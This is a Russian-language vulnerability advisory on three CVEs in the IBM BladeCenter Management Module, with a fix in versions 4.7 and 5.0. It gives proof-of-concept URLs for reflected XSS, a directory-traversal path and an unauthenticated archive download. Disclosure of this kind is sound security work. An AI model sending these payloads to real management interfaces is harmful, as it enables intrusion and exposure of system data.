CVE-2010-2654, CVE-2010-2655, CVE-2010-2656

Вендор

IBM

Продукт

IBM BladeCenter Managemet Module 

Тип уязвимости

Множественные уязвимости

Reported

05.09.2009

Date of Public Advisory

05.07.2010

Автор

Алексей Синцов

Детальное описание

1. Множественные уязвимости межсайтового скриптинга 
*************************************************************
Примеры 
***********
http://[BLADECENTER]/private/cindefn.php?INDEX=3%3C/NOBR%3E%20%3Cscript%3Ealert('XSS1');%3C/script%3E&VLANID=&IPADDR=3>%3Cscript%3Ealert('XSS2');%3C/script%3E
http://[BLADECENTER]/private/power_management_policy_options.php?domain=3<XSS> 

http://[BLADECENTER]/private/pm_temp.php?view=6&mod_type=3&slot=3<XSS> 

http://[BLADECENTER]/private/power_module.php?view=4&mod_type=4&slot=3<XSS> 
http://[BLADECENTER]/private/pm_temp.php?view=6&mod_type=3&slot=3<XSS> 
http://[BLADECENTER]/private/blade_leds.php?WEBINDEX=3<XSS> 

http://[BLADECENTER]/private/ipmi_bladestatus.php?SLOT=3<XSS>&save=1 

2. Листинг директорий
*************************
Атакующий должен иметь учетную запись в системе для выполнения листинга.

http://[BLADECENTER]/private/file_management.php?DIR=/../../../tmp/etc 

3. Неавторизованный доступ
******************************
Данный архивный файл доступен без аутентификации: 
http://[BLADECENTER]/private/sdc.tgz 

В этом контейнере содержится чувствительная информация: журнал событий, системные данные и т.д. 

Решение 
**********
Все три уязвимости устранены в версиях v4.7 и v5.0